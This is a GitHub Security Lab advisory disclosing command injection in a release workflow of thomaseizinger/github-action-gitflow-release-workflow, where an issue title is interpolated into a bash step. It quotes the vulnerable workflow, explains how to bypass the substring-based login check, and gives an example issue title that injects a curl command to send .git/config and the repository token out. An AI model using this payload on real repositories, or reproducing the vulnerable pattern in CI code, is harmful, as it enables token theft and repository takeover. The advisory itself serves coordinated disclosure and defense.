skip to content
Back to
Home Bounties Research Advisories CodeQL Wall of Fame Get Involved Events
February 3, 2021

GHSL-2020-186: Command injection in thomaseizinger/github-action-gitflow-release-workflow

Jaroslav Lobacevski

Coordinated Disclosure Timeline


The ‘draft-new-release.yml’ GitHub workflow is potentially vulnerable to arbitrary command injection, that may lead to the repository being compromised.


thomaseizinger/github-action-gitflow-release-workflow GitHub repository

Tested Version

draft-new-release.yml from the dev branch.


Issue: The body of a public GitHub issue is used to format a shell command

When a user creates a public issue that begins with Release version it automatically starts the draft-new-release.yml GitHub workflow. The title of the issue is used to format a bash script.

# Only run for issues with a specific title and label. Not strictly required but makes finding the release issue again later easier.
# There is also a whitelist that you may want to use to restrict, who can trigger this workflow.
# Unfortunately, we cannot create an array on the fly, so the whitelist is just comma-separated.
if: startsWith(github.event.issue.title, 'Release version') && contains(github.event.issue.labels.*.name, 'release') && contains('thomaseizinger,yourusername', github.event.issue.user.login)
    - uses: actions/checkout@v2

    - name: Extract version from issue title
    run: |
        TITLE="${{ github.event.issue.title }}"
        VERSION=${TITLE#Release version }

There are two safeguards to prevent random users from triggering the workflow: user login name check and label check.
The login name is bypassable with any user name that is a substring of thomaseizinger,yourusername. Like eizi, thom, etc.
The label check is the only one that prevents exploitation, but it may be removed accidentally in the future. There is even a comment that indicates it is Not strictly required.


This vulnerability allows for arbitrary command injection into the bash script. For example a user may create an issue with the title Release version"; curl -d @.git/config; sleep 10 # which will exfiltrate the temporary GitHub repository authorization token to the attacker controlled server. Although the token is not valid after the workflow finishes, since the attacker controls the execution of the workflow he or she can delay it to give the malicious server time to modify the repository.


This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).


You can contact the GHSL team at, please include a reference to GHSL-2020-186 in any communication regarding this issue.